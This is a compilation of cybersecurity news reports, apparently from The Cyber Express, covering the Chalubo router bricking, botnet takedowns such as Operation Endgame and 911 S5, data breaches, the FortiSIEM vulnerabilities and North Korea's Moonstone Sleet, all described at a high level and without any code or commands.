The attack began on October 25, 2023, as the ISP's subscribers began reporting their ActionTec T3200 and Sagemcom routers had suddenly stopped working. Users described the devices as unresponsive, with a steady red light on the front panel. Many blamed the ISP for the mass "bricking" of the routers, alleging the company had pushed faulty firmware updates. However, according to new research by Black Lotus Labs, the incident was in fact the result of a deliberate, malicious act. The researchers reported that over a 72-hour period, a malware known as "Chalubo" had infected over 600,000 routers connected to a single autonomous system number (ASN) belonging to an unnamed ISP. While the researchers avoided naming the ISP affected in the attack, the description of the attack matches frustrations expressed months ago by subscribers of the Windstream ISP, such as the router affected and its resulting behavior. The Chalubo malware, a commodity remote access trojan (RAT) first identified in 2018, employed sophisticated tactics to cover its tracks. It removed all files from the infected devices' disks, ran entirely in memory, and assumed random process names already present on the routers. The researchers believe the malware downloaded and ran code that permanently overwrote the router's default device firmware, rendering them permanently inoperable. The researchers state that while the motives behind the attack are unknown, its implications are troubling.Researchers Unsure Over Initial Attack Vector but Theorize Possibilities
Although the researchers identified the malware's multi-chain attack process and its spread across the ISP's network, they have been unable to determine the initial infection vector employed by the threat actor. They theorize that it could have possibly resulted from the exploit of an inherent vulnerability, exploit of weak credentials, or compromise of the routers' administrative panels. The researchers said the attack is highly concerning, as it represents a new precedent for malware capable of mass-bricking consumer networking devices. The researchers could only recall one prior similar event - the 2022 discovery of the AcidRain malware, which knocked out over 10,000 satellite internet modems in Ukraine and Europe during the start of the Russian invasion. The researchers said the impact of "Pumpkin Eclipse" attack was particularly severe, as the affected ISP's service area covers many rural and underserved communities. Residents may have lost access to emergency services, farmers could have been cut off from remote crop monitoring, and healthcare providers may have been unable to access patient records or provide telehealth services. "At this time, we do not assess this to be the work of a nation-state or state-sponsored entity," the Lumen researchers wrote. In fact, we have not observed any overlap with known destructive activity clusters; particularly those prone to destructive events such as Volt Typhoon, or SeaShell Blizzard. Nonetheless, they speculated that usage of a commodity malware family may have been a deliberate move to obscure the perpetrator's potential identity. Recovery from such a supply chain disruption is always more challenging in isolated or vulnerable regions, the researchers added. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Internet Archive Defends Against Cyberattack Amid DDoS Assault
Internet Archive Cyberattack Targets Multiple Systems
According to a blog post shared by Internet Archive on May 28, intermittent service disruptions have been reported over the past few days, confirmed by updates shared by Archive officials on social media platforms. Despite efforts to mitigate the attack, the exact source remains undisclosed. In response to the DDoS attack, Brewster Kahle, the founder and digital librarian of the Internet Archive, expressed gratitude for the outpouring of support while reaffirming the organization's commitment to fortify its defenses. Kahle characterized the attack as "sustained, impactful, targeted, adaptive, and importantly, mean" in the blog post.Mitigation Against the Internet Archive DDoS Attack
The Internet Archive serves as a valuable resource for users seeking access to a diverse range of media content, both historical and contemporary, free of charge. However, its mission to democratize access to knowledge has encountered legal challenges, with the organization facing lawsuits from the U.S. book publishing and recording industry associations in the last year. The legal actions alleged copyright infringement and sought significant damages, casting a shadow over the future operations of libraries worldwide. The cyberattack on the Internet Archive echoes a troubling trend of attacks targeting libraries and knowledge institutions globally. Recent victims include the British Library, the Solano County Public Library in California, the Berlin Natural History Museum, Ontario’s London Public Library, and just this week, the Seattle Public Library. In light of the ongoing cyberattack and legal battles, Kahle emphasized the broader implications for libraries everywhere. He warned that the actions of publishing and recording industries threaten to undermine the very existence of libraries, posing a grave concern for patrons worldwide. This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the Internet Archive cyberattack or any further communication from the organization. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Johnson & Johnson Reports Data Breach Potentially Linked to Massive Cencora Breach
Johnson & Johnson Data Breach Notice
On May 29, Johnson & Johnson filed a notice of data breach with the Attorney General of Texas, indicating that an unauthorized party accessed confidential patient information. The breach affected approximately 175,000 Texans, but the total number of victims nationwide could be much higher. The breach affects two Johnson & Johnson entities: Johnson & Johnson Patient Assistance Foundation, Inc., and Johnson & Johnson Services, Inc. The following data was compromised in the attack: Name of individual, Address, Medical Information, and Date of Birth. Data breach notification letters have been sent to all the affected individuals, while limited information is available on the Texas Attorney General's data breach reports page. The incident is potentially linked to a much larger breach involving Cencora, which has affected over a dozen major pharmaceutical companies so far.Link to Cencora Data Breach
The Johnson & Johnson data breach bears several similarities to other large third-party pharmaceutical company data breaches affected by the Cencora/Lash Group data breach, which was first discovered on February 21. Cencora’s Lash Group division aids pharmaceutical companies in running patient support programs that try to ensure that costly medication is available to disadvantaged patients, regardless of their ability to pay for them. At least 15 clients of Cencora/Lash Group have notified state authorities of data breach incidents, with databreaches.net listing the following victims:- AbbVie: 54,344 Texans affected
- Acadia Pharmaceuticals: 753 Texans affected
- Bayer: 8,822 Texans affected
- Bristol Myers Squibb and/or the Bristol Myers Squibb Patient Assistance Foundation: 256,237 Texans and 11,503 New Hampshire residents affected
- Dendreon: 2,923 Texans affected
- Endo: no numbers provided
- Genentech: 5,805 Texans affected
- GlaxoSmithKline Group of Companies and/or the GlaxoSmithKline Patient Access Programs Foundation: no numbers provided
- Incyte Corporation: 2,592 Texans affected
- Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.: 466 Texans and 27 New Hampshire residents affected
- Novartis Pharmaceuticals: 12,134 Texans affected
- Pharming Healthcare, Inc.: 314 Texans and 9 New Hampshire residents affected
- Regeneron Pharmaceuticals: 91,514 Texans affected
- Sumitomo Pharma America, Inc.: 24,102 Texans affected
- Tolmar: 1 New Hampshire resident
“There is no evidence that any of this information has been or will be publicly disclosed, or that any information was or will be misused for fraudulent purposes as a result of this incident, but we are communicating this so that affected individuals can take the steps outlined below to protect yourself.”The Leash Group is offering free credit monitoring and remediation services to affected individuals, and additional guidance on dealing with suspected breaches of personal information. No perpetrator has been identified or named as being responsible for the attack, and the potential impact of the breach is still being assessed. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Deuterbear RAT: China-Linked Hackers’ Cyber Espionage Tool
Media reports claim that cybersecurity experts have recently unveiled new details about a remote access trojan (RAT) named Deuterbear, employed by the China-linked hacking group BlackTech. This sophisticated Deuterbear RAT malware is part of a broader cyber espionage operation targeting the Asia-Pacific region throughout the year. Advancements Over Waterbear Deuterbear exhibits notable advancements over […]
The post Deuterbear RAT: China-Linked Hackers’ Cyber Espionage Tool appeared first on TuxCare.
The post Deuterbear RAT: China-Linked Hackers’ Cyber Espionage Tool appeared first on Security Boulevard.
Fortinet FortiSIEM Vulnerabilities Expose Systems to Remote Code Execution
Understanding the Fortinet FortiSIEM Vulnerability
The severity of the Fortinet FortiSIEM vulnerability varies based on the privileges associated with the compromised service account, with administrative accounts posing the highest risk. According to SingCERT, proof of concept exploits are already available for CVE-2024-23108 and CVE-2023-34992, indicating an immediate threat to vulnerable systems. Fortinet FortiSIEM versions 7.1.0 through 7.1.1, 7.0.0 through 7.0.2, 6.7.0 through 6.7.8, 6.6.0 through 6.6.3, 6.5.0 through 6.5.2, and 6.4.0 through 6.4.2 are all affected by the vulnerabilities. The risks associated with these vulnerabilities vary across different sectors, with large and medium government entities and businesses facing high risks, while small government entities and businesses face a medium level of risk. Home users, however, are considered to have a low-risk exposure.Technical Analysis of FortiSIEM Vulnerability
Technical analysis of these FortiSIEM vulnerabilities reveals that the flaw primarily exploits the execution tactic, specifically targeting the Command and Scripting Interpreter technique. Multiple instances of improper neutralization of special elements used in OS Command have been identified in the FortiSIEM supervisor. These vulnerabilities could be exploited by remote, unauthenticated attackers via specially crafted API requests. To mitigate the risks associated with these FortiSIEM vulnerabilities, it is recommended to promptly apply patches provided by FortiNet after thorough testing. Other measures, include establishing and maintaining a documented vulnerability management process for enterprise assets, performing regular automated application updates, enforcing network-based URL filters to limit access to potentially malicious websites, implementing the Principle of Least Privilege for privileged account management, blocking unauthorized code execution through application control, and script blocking, establishing and maintaining a secure configuration process for enterprise assets and software, and address penetration test findings according to the enterprise's remediation policy. By adhering to these recommendations, organizations can effectively mitigate the vulnerabilities in Fortinet FortiSIEM, safeguarding their systems against potential remote code execution exploits. Stakeholders must prioritize these actions to ensure the security and integrity of their IT infrastructure. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Operation Endgame – Largest Ever Operation Against Multiple Botnets Used to Deliver Ransomware
“This is the largest ever operation against botnets, which play a major role in the deployment of ransomware,” Europol said.Botnets are used for different types of cybercrime including ransomware, identity theft, credit card scams, and several other financial crimes. “The dismantled botnets consisted of millions of infected computer systems,” a joint press statement from the Operation Endgame team said. Led by France, Germany, and the Netherlands, and supported by Eurojust, the operation involved countries including Denmark, the United Kingdom, the United States, Armenia, Bulgaria, Lithuania, Portugal, Romania, Switzerland, and Ukraine. Operation Endgame resulted in:
- 4 arrests - 1 in Armenia and 3 in Ukraine.
- 16 location searches - 1 in Armenia, 1 in the Netherlands, 3 in Portugal, and 11 in Ukraine.
- Over 100 servers dismantled or disrupted in countries such as Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the UK, the US, and Ukraine.
- Over 2,000 domains seized and brought under law enforcement control.
- 8 summons were also served against other suspects.
Targeting the Cybercrime Infrastructure
Operation Endgame focused on high-value targets, their criminal infrastructure behind various malware and the freezing of illicit proceeds. “The malware, whose infrastructure was taken down during the action days, facilitated attacks with ransomware and other malicious software,” according to Europol. One primary suspect, the Europol said, earned at least €69 million in cryptocurrency by renting out sites for ransomware deployment. Authorities are closely monitoring these transactions and have secured permissions to seize the assets. The infrastructure and financial seizures had a global impact on the dropper ecosystem, the authorities believe.Key Dropper Malware Dismantled in Operation Endgame
- SystemBC: Facilitated anonymous communication between infected systems and command-and-control servers. - Bumblebee: Delivered via phishing campaigns or compromised websites, enabling further payload execution. - Smokeloader: Used primarily to download and install additional malicious software. - IcedID (BokBot): Evolved from a banking trojan to a multi-purpose tool for various cybercrimes. - Pikabot: Enabled ransomware deployment, remote takeovers, and data theft through initial system access.“All of them are now being used to deploy ransomware and are seen as the main threat in the infection chain,” Europol said.[caption id="attachment_72953" align="aligncenter" width="1920"] Operation Endgame seizure notice (Credit: Europol)[/caption]
The Role of Dropper Malware in Cyberattacks
Droppers are essential tools in cyberattacks, acting as the initial vector to bypass security and install harmful software such as ransomware and spyware. They facilitate further malicious activities by enabling the deployment of additional malware on compromised systems.How Droppers Operate
- Infiltration: Enter systems through email attachments, compromised websites, or bundled with legitimate software.
- Execution: Install additional malware on the victim's computer without the user's knowledge.
- Evasion: Avoid detection by security software through methods like code obfuscation and running in memory.
- Payload Delivery: Deploy additional malware, potentially becoming inactive or removing itself to evade detection.
Wait for Operation Endgame Season 2
Operation Endgame signifies a major victory, but this is not really the end of it. Taking cue from the Marvel cinematic movie ‘Avengers – Endgame,’ the law enforcement is set to to release a part two of this operation in a few hours from now as they said their efforts continue.“This is Season 1 of operation Endgame. Stay tuned. It sure will be exciting. Maybe not for everyone though. Some results can be found here, others will come to you in different and unexpected ways,” the authorities said.“Feel free to get in touch, you might need us. Surely, we could both benefit from an openhearted dialogue. You would not be the first one, nor will you be the last. Think about (y)our next move.” Future actions will be announced on the Operation Endgame website, possibly targeting suspects and users, and ensuring accountability. The news of this massive botnet takedown operation comes a day after the announcement of the dismantling of “likely the world’s largest botnet ever” – the 911 S5 botnet. The botnet’s alleged administrator Yunhe Wang, was arrested last week and a subsequent seizure of infrastructure and assets was announced by the FBI. The recent law enforcement actions represent a historic milestone in combating cybercrime, dealing a significant blow to the dropper malware ecosystem that supports ransomware and other malicious activities. The operation's success underscores the importance of international cooperation and the need for robust cybersecurity measures to tackle evolving threats.
BBC Data Breach: Over 25,000 Employee Records Compromised, Investigation Underway
BBC Data Breach Impacts Current and Former Employees
According to Birmingham Live, the security incident is being taken "extremely seriously” by the BBC and there is “no evidence of a ransomware attack.” Despite speculation of a possible ransomware attack, the British public service broadcaster has dispelled any conjecture, asserting that there is currently no evidence supporting this theory. The BBC clarified that the breach stemmed from private records being illicitly accessed from an online data storage service. Catherine Claydon, Chair of the BBC Pension Trust, assured employees that swift action had been taken to address the breach and secure the affected data source, The Guardian reported. In an email sent to the staff, Claydon reassured the employees that “BBC have taken immediate steps to assess and contain the incident.” Talking about the mitigation strategies, the organization stated “We are working at pace with specialist teams internally and externally to understand how this happened and take appropriate action. As a precaution, we have also put in place additional security measures and continue to monitor the situation.” The legal obligation of this data breach are far reaching and in cases where the incident impacts individual rights and freedoms, "this comes with a regulatory obligation to notify the Information Commissioner, and where people are at "high risk" the affected organisation must notify those individuals too without undue delay", said Lauren.BBC Employee Data Breach and Ongoing Investigation
Despite assurances from the BBC, concerns linger regarding the potential misuse of the compromised information. Employees have been advised to remain vigilant and report any suspicious activity promptly. The breach, though attributed to a third party cloud storage provider, threatens the security of the impacted individuals, and "BBC - and any ‘data controller’ under data protection laws - remains primarily responsible for the security measures it adopts and external providers it engages to store and protect its personal data", added Lauren. Moreover, no passwords or bank details "appear to have been compromised, but the advice for those individuals involved is to be vigilant of any unusual activity or requests". Acknowledging the severity of the breach, a spokesperson for the BBC pension scheme issued a sincere apology to affected members. Reassurances were offered regarding the swift response and containment of the breach, coupled with ongoing efforts to upgrade security measures and monitor the situation closely. Inquiries into the incident are ongoing, with external cybersecurity experts collaborating with internal teams to dissect the breach and its implications thoroughly. However, as of now, no official statement has been issued regarding the involvement of ransomware groups in the breach. This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the BBC employee data breach or any official response from the organization.911 S5 Botnet — Likely the World’s Largest Botnet Ever, Dismantled
“Working with our international partners, the FBI conducted a joint, sequenced cyber operation to dismantle the 911 S5 Botnet—likely the world’s largest botnet ever,” said FBI Director Christopher Wray.“We arrested its administrator, Yunhe Wang, seized infrastructure and assets, and levied sanctions against Wang and his co-conspirators,” Wray added. Wang and two of his associates, along with three Thailand-based businesses linked to the botnet, were sanctioned by the U.S. Treasury Department on Tuesday. Wang faces up to 65 years in prison on charges that include computer fraud, wire fraud, and money laundering.
911 S5 Botnet Operations
Beginning in 2014, Wang allegedly developed and distributed malware that compromised millions of Windows operating systems worldwide, including over 600,000 IP addresses in the U.S. Wang allegedly spread malware through malicious VPN programs like MaskVPN and DewVPN, as well as through pirated software bundled with malware. Wang managed and controlled approximately 150 dedicated servers worldwide.“Using the dedicated servers, Wang was able to deploy and manage applications, command and control the infected devices, operate his 911 S5 service and provide to paying customers access to the proxied IP addresses associated with the infected devices,” Wang's indictment said.The residential proxy service that Wang developed and operated allowed subscribers to access the more than 19 million compromised IP addresses, which helped them mask their online activities. This service generated approximately $99 million for Wang. The 911 S5 botnet facilitated a range of cybercrimes, including cyberattacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations, Garland said. One such example is that of customers using the botnet's services for fraudulently filing 560,000 unemployment insurance claims that resulted in a confirmed loss of $5.9 billion from federal pandemic relief programs. In another instance, the 911 S5 botnet customers used the service to file more than 47,000 Economic Injury Disaster Loan applications, which again resulted in the loss of millions of dollars.
Infrastructure and Assets Seized
Authorities seized 23 internet domains and more than 70 servers, which formed the core of the 911 S5 botnet and its successor services. This action effectively shut down the botnet and prevented Wang from reconstituting the service under a new name, Clourouter.io. The U.S. Department of Justice emphasized that this seizure closed existing malicious backdoors used by the botnet. Wang allegedly used the proceeds from the botnet to purchase properties across the globe, including the U.S., China, Singapore, Thailand, the United Arab Emirates, and St. Kitts and Nevis, where he also holds a citizenship. Authorities have moved to forfeit his assets, which include 21 properties and a collection of luxury cars such as a Ferrari F8, several BMWs, and a Rolls Royce.Investigation Triggered by Ecommerce Incident
The investigation into the 911 S5 botnet was initiated following a probe into more than 2,000 fraudulent orders placed with stolen credit cards on ShopMyExchange, an e-commerce platform linked to the Army and Air Force Exchange Service. The perpetrators in Ghana and the U.S. were found to be using IP addresses acquired from 911 S5.“Although approximately 2,525 fraudulent orders valued at $5.5 million were submitted, credit card fraud detection systems and federal investigators were able to thwart the bulk of the attempted purchases, reducing the actual loss to approximately $254,000,“ the Justice Department said.The latest takedown is part of a broader effort of the Justice Department to combat nation-state hacking and international cybercrime. At the beginning of the year, the Justice Department dismantled botnets linked to the China-affiliated hacking group Volt Typhoon, followed by the disruption of botnet controlled by the Russian APT28 group associated with the Russian military intelligence, the GRU. Google-owned cybersecurity firm Mandiant also warned last week that Chinese state hackers are increasingly using vast proxy server networks, built from compromised online devices and virtual private servers, to evade detection during their cyberespionage campaigns. Garland highlighted the global collaboration in this operation, underscoring the Justice Department's commitment to disrupting cybercrime networks that pose a significant threat to individuals and national security. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Windows Defender Bypass Tool Shared on GitHub
Windows Defender Bypass Requires Admin Privileges
EDR (endpoint detection and response) and antivirus software bypasses aren’t uncommon, as hackers and researchers alike have found ways to disable security defenses. Security researchers and testers often turn off security defenses in the course of research and testing, so such tools have legitimate uses too. As one commenter noted on the ycombinator Hacker News feed, "Defender is a real irritant when doing security research and is near impossible to turn off completely and permanently. Even using the Group Policy Editor or regedits is not reliable. If you do get it to stop, it will randomly reenable itself weeks later...For the vast majority of people this is a good thing!" Dormann noted that elevated admin privileges are all that’s required to run the No Defender tool, so Windows users have yet another reason not to run Windows as an admin. “If you don't log in to Windows as an admin, as we security-conscious people do, then you won't have as much to worry about,” Dormann wrote. One Mastodon commenter saw the GitHub tool as an Avast flaw rather than Microsoft’s, noting that “it requires an executable signed with AuthentiCode SigningLevel 7 ("Signed by an Antimalware vendor whose product is using AMPPL"). “I see this more as a vulnerability of the Avast wsc_proxy.exe component misused here that allows untrusted/unsigned code to interact with it,” said the commenter, who goes by the handle “faebudo.” The Cyber Express reached out to Microsoft and Avast for comment and will update this article with any response. But Dormann told The Cyber Express the issue is "more of a novelty than a vulnerability per se. Admin-privileged users can do admin things. Which includes reconfiguring the system they're on. Including kernel-level access."BreachForums Breached? Forum’s Return Sparks Fear Among Cybercriminals
BreachForums Seizure and Return
BreachForums, widely recognized as the successor to RaidForums, has faced several downtimes, seizures and disruptions in its eventful history. The original owner, Conor Brian Fitzpatrick AKA "Pompompurin," was arrested last year on cybercrime and device fraud charges. BreachForums administrator "Baphomet" announced that he would step in as successor and opened a new domain to resume forum activity. However, Baphomet himself feared site compromise by law enforcement and temporarily shut down the forums, expressing that "nothing is safe anymore." [caption id="attachment_72568" align="alignnone" width="1536"] Source: Cyble[/caption] However, Baphomet later announced that he would be working on a new domain and resuming forum operations. The forum soon returned with regular facilitation of data leak sharing and discussion. A year later, Baphomet himself faced arrest after a joint operation from law enforcement, which also seized the BreachForums domain and official Telegram channel. The administrator ShinyHunters emerged as the successor, confirming Baphomet's arrest. However, the domain seizure was short-lived, and was soon redirecting users to a new Telegram channel. An allegedly leaked conversation from an FBI operative to BreachForum's previous domain name registrar and hosting provider NiceNic also appeared to indicate that ShinyHunters had regained control over domain ownership despite its court-ordered seizure. [caption id="attachment_72579" align="alignnone" width="326"] Source: Telegram[/caption] After a period of dysfunction, BreachForums has now resumed operations, with threat actors already claiming new victims on its forum postings.Emerging Alternatives and Criminal Suspicion Over BreachForums
In the wake of the recent seizure, several other individuals expressed their doubts over BreachForums and its possible usage as a "honeypot" by law enforcement to entrap cybercriminals and disrupt operations. The owner of Secretforums and former owner of Blackforums expressed his belief over Telegram that Baphomet was possibly an informant to law enforcement, citing the latter's interest in maintaining the infrastructure of Blackforums. Prominent threat actor USDoD also cast doubt over the succession of BreachForums to the administrator Shiny Hunters, citing his low stats on the previous domain. These concerns were followed by the self-promotion of SecretForum's and USDoD's announced project "Breach Nation" as possible alternatives. More recently, the CyberNi***rs threat actor group also announced its intention to start a new site to coordinate its operations. Despite these activities and the surrounding suspicion, new owner Shiny Hunters seems eager to return to earlier activities and operations, as judged by their claim of responsibility for an attack impacting Live Nation Entertainment Inc., the parent company of Ticketmaster. The results of these events, their effect on the cybercriminal ecosystem, as well as the viability of emerging forums as alternatives to the relaunched BreachForums led by ShinyHunters, remain unclear. But given how vocal the participants are, the picture will almost certainly get clearer with time. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.U.S. Treasury Sanctions Chinese Nationals Behind Billion-Dollar 911 S5 Botnet Fraud
The Rise and Demise of 911 S5 Botnet
The botnet in question played a critical role in executing numerous fraudulent schemes through stolen residential IP addresses."The 911 S5 botnet compromised approximately 19 million IP addresses and facilitated the submission of tens of thousands of fraudulent applications related to the Coronavirus Aid, Relief, and Economic Security Act programs by its users, resulting in the loss of billions of dollars to the U.S. government."911 S5 is a residential proxy botnet that allows its paying users, often cybercriminals, to select the IP addresses they can use to connect to the internet using intermediary, internet-connected computers that have been compromised without the computer owners’ knowledge. 911 S5 essentially enables cybercriminals to conceal their originating location, effectively defeating fraud detection systems, the U.S. Treasury explained. The 911 S5 botnet was also implicated in a series of bomb threats made in July 2022, according to the Treasury. Investigators found links of IP addresses within the proxy botnet network being used in this incident. The network was connected to 911 S5, a residential proxy service that allowed users to mask their IP addresses by routing their web activity through compromised devices. The 911 S5 service went offline in July 2022, following a purported hacking incident that damaged essential data. The disruption was reported by independent journalist Brian Krebs. Despite its shutdown, the impacts of its previous operations continued to reverberate, leading to the current sanctions.
The Individuals and Businesses Sanctioned
The sanctioned individuals include Yunhe Wang, allegedly the administrator of the botnet; Jingping Liu, accused of laundering proceeds for Wang; and Yanni Zheng, who reportedly acted as power of attorney for Wang and facilitated business transactions on his behalf through the company Spicy Code Company Limited. The men are believed to reside in Singapore and Thailand, countries that were acknowledged as partners in the sanctions announcement. Three businesses registered in Thailand were also sanctioned for their connections to Wang. These sanctions require that any property and interests owned by the three men within the U.S. be reported to the Treasury, and prohibit U.S. citizens or residents from engaging in business with them. Only these three individuals and the businesses implicated in their fraudulent schemes were sanctioned by the Treasury, but no indictments or legal actions were revealed by the U.S. Department of Justice (DOJ), as is the case in many other instances.Broader Ongoing Cybersecurity Concerns
The sanctions against these individuals are part of a broader effort by the U.S. government to address cybersecurity threats linked to state-sponsored hacking groups. Google-owned cybersecurity firm Mandiant warned last week that Chinese state hackers are increasingly using vast proxy server networks, built from compromised online devices and virtual private servers, to evade detection during their cyberespionage campaigns. In January, the DOJ announced the takedown of a botnet associated with Volt Typhoon, a hacking group with ties to the Chinese government. This group was known for infecting home and office routers with malware to obscure its hacking activities. The concerted actions by U.S. authorities and private defenders highlight the ongoing challenges and complexities in combating cybercrime and protecting critical financial and infrastructural systems from sophisticated malicious actors. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.A Quest Gone Awry: Hackers Disrupt Bring Me The Horizon’s Hidden M8 Artificial Reality Game
Bring Me The Horizon Hidden M8 Artificial Reality Game
Bring Me the Horizon, a British rock band formed in Sheffield in 2004, is celebrated for embedding hidden meanings, easter eggs, and clues in their music. With the release of their latest album, 'POST HUMAN: NeX GEn,' the band has notably deepened this practice, incorporating even more intricate layers of secrets into their songs. In one of the music videos from this album, a character named 'M8' appears and begins to greet the viewer but is abruptly stopped by a 'fatal-error'. M8 then directs the viewer to find the 'serial number' located on the side of its head. A curious listener appeared to have further analyzed the video segment in the video and discovered a hidden spectrogram containing a QR Code, sharing an image file on the rock band's subreddit. Fans further discovered that the QR code led to the URL domain of a hidden clandestine hacking-themed website, containing the M8 Artificial Reality Game. [caption id="attachment_72429" align="alignnone" width="233"] Source: /r/BringMeTheHorizon subreddit[/caption] The M8 Artificial Reality domain then instructed users to enter a hidden serial code, which fans discovered through the use of several other clues. The site contained unreleased tracks, password-protected files, and various mysteries for fans to uncover. [caption id="attachment_72432" align="alignnone" width="2800"] Source: multidimensionalnavigator8.help[/caption] As news of the hidden website spread, fans swiftly set up a dedicated Discord server and collaborated using a Google Doc to unearth all the site’s secrets. However, their excitement was brief. Hackers soon tried to extract further secrets from the website using unconventional methods, leading developers to temporarily shut down the site and issue a warning to fans.Warnings Over Hacking Attempts
After the hacking attempts, cautionary messages from M8, the album's virtual guide, expressed dismay at the intrusion, stressing on how such actions undermined the spirit of collective exploration. These messages were delivered through both the website which was temporarily replaced with the warning for 2 hours as well as through email. [caption id="attachment_72445" align="alignnone" width="2800"] Source: archive.org[/caption] [caption id="attachment_72448" align="alignnone" width="276"] Source: BringMeTheHorizon ARG Discord[/caption] The developers appeared to indirectly condemn these attempts through the creative use of the M8 character, without specifying the nature of the intrusion or identifying the perpetrators. Some fans however, upon receiving the email after their explorations, found the message warnings unexpected for what they believed were legitimate interactions. The community believed that these selective few hackers ruined the experience for others, with it's discord server noting the downtime in it's FAQ. 0 Bring Me The Horizon's foray into alternate reality gaming showcases the creative potential of digital media in music and album promotion. As fans continue to work together to unravel the remaining mysteries and solve the puzzles within the ARG, it remains to be seen what other surprises await them on the hidden website. The hacking attempts and the subsequent warnings serves as a reminder that while ARGs can be an engaging and immersive experience, it is essential to respect the developers' intentions and play fair to ensure everyone can enjoy the journey together. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.North Korean Threat Actor Deploying New FakePenny Ransomware: Microsoft
“Microsoft assesses that Moonstone Sleet’s objective in deploying the ransomware is financial gain, suggesting the actor conducts cyber operations for both intelligence collection and revenue generation.”FakePenny ransomware demands exorbitant ransoms, with recent demands reaching $6.6 million in Bitcoin. “This is in stark contrast to the lower ransom demands of previous North Korea ransomware attacks, like WannaCry 2.0 and H0lyGh0st,” Microsoft said. Notably, the ransom note used by FakePenny ransomware closely resembles the one employed in the infamous NotPetya ransomware attack, which is attributed to the North Korean group Seashell Blizzard. This continuity in tactics highlights the interconnected nature of North Korean cyber operations.
Moonstone Sleet’s Strategy and Tradecraft
Moonstone Sleet has a diverse set of operations supporting its financial and espionage objectives. This group has been observed creating fake companies, employing trojanized versions of legitimate tools, and even developing malicious games to infiltrate targets. Their ability to conduct concurrent operations and quickly evolve and adapt their techniques is notable. The threat actor, as noted earlier, has several different tradecrafts under its belt. In early August 2023, Moonstone Sleet delivered a compromised version of PuTTY, an open-source terminal emulator, through platforms like LinkedIn, Telegram, and freelancing websites. The trojanized software decrypted and executed the embedded malware when the user provided an IP and password mentioned in a text document contained in the malicious Zip file that the threat actor sent. The same technique was used by another North Korean actor Diamond Sleet. Moonstone Sleet has also targeted victims using malicious “npm” packages distributed through freelancing sites and social media. These packages often masqueraded as technical assessments, lead to additional malware downloads when executed. Since February 2024, Moonstone Sleet has also taken a different approach by using a malicious game called DeTankWar to infect devices. The group approached targets posing as a game developer or fake company, presenting the game as a blockchain project. Upon launching the game, additional malicious DLLs were loaded, executing a custom malware loader known as “YouieLoad.” This loader performs network and user discovery and browser data collection.Fake Companies and Work-for-Hire Schemes
Since January 2024, Moonstone Sleet has created several fake companies, including StarGlow Ventures and C.C. Waterfall, to deceive targets. These companies posed as software development and IT service firms, often related to blockchain and AI, to establish trust and gain access to organizations. Moonstone Sleet has also pursued employment opportunities in legitimate companies, which is consistent with reports of North Korea using remote IT workers to generate revenue. Recently, U.S. charged North Korean job fraud nexus that was amassing funds to support its nuclear program. The nexus scammed more than 300 U.S. companies and accumulated at least $6.8 million. This employment tactic could also provide another avenue for gaining unauthorized access to organizations. Moonstone Sleet’s notable attacks include compromising a defense technology company to steal credentials and intellectual property and deploying ransomware against a drone technology firm.“Despite being new, Moonstone Sleet has demonstrated that it will continue to mature, develop, and evolve, and has positioned itself to be a preeminent threat actor conducting sophisticated attacks on behalf of the North Korean regime.”
Defending Against Moonstone Sleet
To defend against Moonstone Sleet, Microsoft recommends endpoint detection and response (EDR), implementing attack surface reduction rules to block executable content from email clients and webmail, preventing executable files from running unless they meet specific criteria, use advanced protection against ransomware, and block credential stealing from LSASS. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.TRC Staffing Data Breach Fallout: Murphy Law Firm Offers Legal Support to Victims
Understanding the Full Extent of the TRC Staffing Data Breach
In response to this TRC Staffing breach, Murphy Law Firm is actively engaging on behalf of those impacted. Their investigation aims to uncover the full extent of damages and explore avenues for legal recourse, including the possibility of a class action lawsuit. Individuals who have received notifications of the breach or suspect their information may have been compromised are urged to take action. By visiting the dedicated page at https://murphylegalfirm.com/cases/trc-data-breach/, affected parties can access information regarding their rights and legal options. The repercussions of this breach extend beyond mere inconvenience. With personal and highly confidential information potentially circulating on the dark web, the identity of users is at risk. Murphy Law Firm recognizes the urgency of addressing these concerns and is advocating for the rights of those affected.How Can Victims Join the TRC Staffing Lawsuit?
To join the lawsuit and seek potential compensation, individuals can fill out a contact form provided by Murphy Law Firm. This form requires essential details such as name, contact information, and whether a breach notification letter was received. Additionally, users can provide any relevant information regarding fraud or suspicious activity they may have experienced. For those seeking guidance or further assistance, Murphy Law Firm can be reached directly via email at abm@murphylegalfirm.com or by phone at (405) 389-4989. Protecting the rights and interests of individuals affected by the TRC Staffing data breach is important, and Murphy Law Firm represents the victims with a legal process. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Check Point VPN Fix Released After Researchers Observe Malicious Access Attempts
Identification of Unauthorized Access Attempts to Check Point VPN
